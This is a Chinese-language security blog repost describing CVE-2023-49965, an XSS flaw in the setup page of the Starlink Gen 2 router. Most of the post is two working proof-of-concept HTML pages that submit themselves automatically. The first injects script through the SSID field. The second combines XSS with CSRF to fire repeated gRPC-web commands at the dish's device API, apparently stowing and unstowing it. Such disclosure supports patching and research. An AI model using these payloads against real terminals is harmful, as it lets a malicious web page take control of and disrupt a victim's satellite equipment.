CVE-2023-49965 SPACE-X 星链 路由器漏洞

admin 2024年9月28日10:46:24评论7 views字数 1862阅读6分12秒阅读模式
  • 产品:Starlink 路由器第 2 代

  • 测试版本:2022.32.0(修复在 2023.48.0 及更高版本中)

  • 漏洞类型:XSS(跨站点脚本)

CVE-2023-49965  SPACE-X 星链 路由器漏洞

该漏洞是由于初始页面 (http://192.168.1.1/setup) 上 and 参数的输入值过滤不足造成的。

<html>  <body>    <h1>Proof of Concept</h1>    <form id="PoC" method="POST" action="http://192.168.1.1/setup">      <input type="hidden" name="ssid" value='" onfocus=javascript:alert(`XSS`); autofocus="'>      <!-- <input type="hidden" name="password" value='" onfocus=javascript:alert(`XSS`); autofocus="'> -->    </form>    <script type="text/javascript">      document.addEventListener("DOMContentLoaded", function() {        document.getElementById("PoC").submit();      });</script>  </body><html>

XSS 结合CSRF 漏洞利用:

<html>  <body>    <h1>Dishy Stow and Unstow</h1>    <form id="PoC" method="POST" action="http://192.168.100.1/setup">      <!-- <input type="hidden" name="ssid" value='" onfocus=javascript:alert(`XSS`); autofocus="'> -->      <input type="hidden" name="password" value='"><script>for(let i=0;i<100;i++){setTimeout(()=>{var xhr=new XMLHttpRequest();xhr.open("POST","http://192.168.100.1:9201/SpaceX.API.Device.Device/Handle",true);xhr.setRequestHeader("x-grpc-web","1");xhr.setRequestHeader("Content-Type","application/grpc-web+proto");xhr.onreadystatechange=()=>{if(xhr.readyState==4&&xhr.status==200){console.log(xhr.responseText);}};xhr.send(new Uint8Array([0,0,0,0,3,146,125,0]).buffer);setTimeout(()=>{var xhr2=new XMLHttpRequest();xhr2.open("POST","http://192.168.100.1:9201/SpaceX.API.Device.Device/Handle",true);xhr2.setRequestHeader("x-grpc-web","1");xhr2.setRequestHeader("Content-Type","application/grpc-web+proto");xhr2.onreadystatechange=()=>{if(xhr2.readyState==4&&xhr2.status==200){console.log(xhr2.responseText);}};xhr2.send(new Uint8Array([0,0,0,0,5,146,125,2,8,1]).buffer);},1000);},i*2000);}</script><input type="hidden'/>    </form>    <script type="text/javascript">      document.addEventListener("DOMContentLoaded", function() {        document.getElementById("PoC").submit();      });</script>  </body><html>

原文始发于微信公众号(合规渗透):CVE-2023-49965 SPACE-X 星链 路由器漏洞

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年9月28日10:46:24
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   CVE-2023-49965 SPACE-X 星链 路由器漏洞https://cn-sec.com/archives/3103725.html

发表评论

匿名网友 填写信息